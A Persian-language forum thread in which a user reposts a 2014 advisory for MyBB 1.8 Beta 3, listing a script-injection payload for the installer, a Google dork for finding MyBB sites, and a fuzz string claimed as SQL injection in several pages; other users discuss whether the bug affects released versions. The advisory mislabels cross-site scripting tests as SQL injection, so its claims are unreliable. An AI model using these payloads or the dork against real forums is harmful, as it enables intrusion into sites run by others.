ورود

Am!r · ۱۳۹۳/۶/۲، ۱۷:۴۲:۴۱ عصر

سلام.
امروز باگ مای بی بی 1.6.15 رو گذاشتم.
این 1.8 هم تازه منتشر شده :

کد php: 
###########################

# MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection

###########################

# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
Now let's finish setup and go to the homepage.
 
 
b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example:localhost/private.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
 
c) SQL Injection in Showthread
Go to -> Show Thread, for example:localhost/showthread.php?tid=1
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
 
d) SQL Injection in Search
Go to -> Search, for example:localhost/search.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
 
e) SQL Injection in Help Documents
Go to -> Help Documents, for example:localhost/misc.php?action=help
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
 
f) SQL Injection in Forum Display
Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
***************************************************
[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-08-23]

########################### 

لینک :

http://www.iedb.ir/exploits-1872.html

این هم برای اطلاع رسانی به دوستان.

MohamadReza · ۱۳۹۳/۶/۲، ۱۸:۰۴:۲۰ عصر

بعید میدونم با این سایتی که اسکن میکنین درست حسابی باشه

از نظر من این سایت هم خودش یه سیخونکی میزنه Big Grin

Am!r · ۱۳۹۳/۶/۲، ۲۳:۴۱:۵۰ عصر

منظور رو نفهمیدم.مشه کامل بگی؟

MohamadReza · ۱۳۹۳/۶/۲، ۲۳:۴۹:۵۳ عصر

اینجور سایت های تست معمولا خودشون یک کرمی به سایتا میریزن یا سیستمو بهم میریزن.

کلا به این سایتا نمیشه اعتماد کرد حالا این سایت خودتونم که هست....

**R. Najafi** · ۱۳۹۳/۶/۳، ۰۰:۱۲:۲۱ صبح

تو ورژن 1.8 بتا 3 این باگ وجود داره. اما ورژنی که روی mybb.com هست خیر
به همین دلایل هست که میگن نسخه های بتا رو روی سایتتون نصب نکنید. حتی ورژن های اولیه مثل 18.0 و 1.8.1 رو هم نباید نصب کرد و منتظر رفع مشکلات احتمالی موند

Am!r · ۱۳۹۳/۶/۳، ۰۰:۱۳:۱۳ صبح

سلام.
این طرز تفکر شما,قابل احترامه.
اما باید یه نکته ای رو بگم.
اصولا یه سایتی هست با نام,google.com
اگه داخل این سرچ کنید,خیلی چیزا دست گیرتون میشه :
مثلا
http://www.exploit-db.com/exploits/34381/
http://1337day.com/exploits/22538
http://packetstormsecurity.com/files/127...sqlxss.txt
و...............
که قبلا اینکه حرفی رو بخواین بزنید,میتونی از اون سوال بپرسین :
https://www.google.com/search?q=%22MyBB+...channel=sb

نکته دوم,انقدر هم ارزش دار نیست که کسی بخواد سایتشو بخاطر این خراب کنه.

ورود
نام کاربری:
گذرواژه‌:	گذرواژه‌تان را فراموش کرده‌اید؟
	مرا به‌خاطر بسپار